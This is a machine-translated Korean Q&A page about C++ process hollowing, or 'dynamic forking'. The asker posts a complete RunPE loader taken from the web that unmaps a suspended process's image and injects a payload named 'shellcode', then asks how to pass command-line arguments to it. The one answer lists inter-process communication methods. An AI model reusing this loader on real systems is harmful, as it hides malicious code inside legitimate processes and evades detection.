2. 질의 응답
  3. C++ Process Hollowing/Dynamic Forking

C++ Process Hollowing/Dynamic Forking

2013-10-03 3 views
1

이 전체 프로세스를 일컬어 동적 포크 - 개념이 실제로 어떻게 작동하는지 이해하려고합니다.C++ Process Hollowing/Dynamic Forking

내가 궁금한 점 중 하나는 포크 프로세스에 명령 줄 인수/매개 변수를 전달하는 방법입니까?

다음은 코드입니다 (웹에서 가져옴). 저는 완벽하게 작동합니다. 메모리에서 실행되는 파일에 CMD 인수를 추가하는 방법을 알아낼 수 없다고 생각합니다.

Hollow.h

typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress); 

class runPE{ 
public: 
    void run(LPSTR szFilePath, PVOID pFile) 
    { 
     PIMAGE_DOS_HEADER IDH;  
     PIMAGE_NT_HEADERS INH;  
     PIMAGE_SECTION_HEADER ISH; 
     PROCESS_INFORMATION PI;  
     STARTUPINFOA SI;   
     PCONTEXT CTX;    
     PDWORD dwImageBase;   
     NtUnmapViewOfSection xNtUnmapViewOfSection; 
     LPVOID pImageBase;   
     int Count;     
     IDH = PIMAGE_DOS_HEADER(pFile); 
     if (IDH->e_magic == IMAGE_DOS_SIGNATURE) 
     { 
      INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew); 
      if (INH->Signature == IMAGE_NT_SIGNATURE) 
      { 
       RtlZeroMemory(&SI, sizeof(SI)); 
       RtlZeroMemory(&PI, sizeof(PI)); 
       if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) 
       { 
        CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE)); 
        CTX->ContextFlags = CONTEXT_FULL; 
        if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) 
        { 
         ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL); 
         if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase) 
         { 
          xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection")); 
          xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase)); 
         } 
         pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE); 
         if (pImageBase) 
         { 
          WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL); 
          for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++) 
          { 
           ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40)); 
           WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL); 
          } 
          WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL); 
          CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint; 
          SetThreadContext(PI.hThread, LPCONTEXT(CTX)); 
          ResumeThread(PI.hThread); 
         } 

        } 
       } 
      } 
     } 
     VirtualFree(pFile, 0, MEM_RELEASE); 
    } 
};

홈페이지

int main() 
{ 
    runPE rp; 
    TCHAR szFilePath[1024]; 
    GetModuleFileNameA(0, LPSTR(szFilePath), 1024); 
    rp.run(LPSTR(szFilePath), shellcode); 
    //Sleep(INFINITE); 
    return 0; 
}

하지만 어떻게/메모리 자체에 갈래됩니다되는 코드에 인수를 전달하기 위해? 나는 해결책없이 7 시간 이상 이걸로 장난하고있다, 누군가가 올바른 방법으로 나를 가리 키거나 그것이 어떻게 완료되었는지 보여주십시오.

출처

2013-10-03 user2404495

답변

0

당신은 항상 interpocess 통신의 어떤 종류를 사용할 수 있습니다

  2. 소켓
  3. 파이프
  4. 파일을
  5. 메일 슬롯을 윈도우 메시지를 가짜 창을 만들고 사용
  6. 공유 메모리

출처

2013-10-03 19:31:27

+0

예를 보여줄 수 있습니까? – user2404495

관련 문제

 관련 문제